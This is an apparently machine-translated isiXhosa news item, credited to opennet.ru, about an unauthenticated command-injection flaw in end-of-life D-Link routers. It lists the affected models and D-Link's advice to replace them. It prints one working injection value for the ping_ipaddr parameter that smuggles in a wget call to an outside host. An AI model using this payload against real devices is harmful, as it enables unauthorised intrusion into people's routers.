Kwi-D-Link iirotha ezingenazingcingo ubuthathaka obunobungozi (), ekuvumela ukuba wenze ukude ikhowudi kwicala lesixhobo ngokuthumela isicelo esikhethekileyo kumphathi we "ping_test", ofikelelekayo ngaphandle kokuqinisekisa.
Okubangel 'umdla kukuba, ngokutsho kwabaphuhlisi be-firmware, umnxeba othi "ping_test" kufuneka uqhutywe kuphela emva kokuqinisekiswa, kodwa ngokwenene kuthiwa kuyo nayiphi na imeko, kungakhathaliseki ukuba ungene kwi-interface yewebhu. Ngokukodwa, xa ufikelela kwi-apply_sec.cgi script kwaye udlula "isenzo=ping_test" ipharamitha, iskripthi siqondisa kwakhona kwiphepha lokuqinisekisa, kodwa kwangaxeshanye senza isenzo esihambelana ne-ping_test. Ukwenza ikhowudi, omnye ubuthathaka usetyenziswe kwi-ping_test ngokwayo, ebiza i-ping utility ngaphandle kokujonga ngokufanelekileyo ukuchaneka kwedilesi ye-IP ethunyelwe ukuvavanywa. Umzekelo, ukubiza i-wget utility kwaye udlulisele iziphumo zomyalelo "we-echo 1234" kumamkeli wangaphandle, cacisa nje ipharamitha "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ubukho bobuthathaka buqinisekisiwe ngokusemthethweni kwezi modeli zilandelayo:
- I-DIR-655 ene-firmware 3.02b05 okanye ngaphezulu;
- I-DIR-866L ene-firmware 1.03b04 okanye ngaphezulu;
- I-DIR-1565 ene-firmware 1.01 okanye ngaphezulu;
- I-DIR-652 (akukho lwazi malunga neenguqulelo ze-firmware eziyingxaki zinikezelweyo)
Ixesha lokuxhasa le mizekelo sele liphelile, ngoko ke D-Link , engayi kukhulula ukuhlaziywa kubo ukuphelisa ubuthathaka, ayicebisi ukuyisebenzisa kwaye icebisa ukuba ithathelwe indawo ngezixhobo ezintsha. Njengomsebenzi wokhuseleko, unokunqanda ukufikelela kujongano lwewebhu kwiidilesi ze-IP ezithembekileyo kuphela.
Kamva kwafunyaniswa ukuba sesichengeni kwakhona iimodeli ze-DIR-855L, i-DAP-1533, i-DIR-862L, i-DIR-615, i-DIR-835 kunye ne-DIR-825, izicwangciso zokukhupha uhlaziyo olungekaziwa.
umthombo: opennet.ru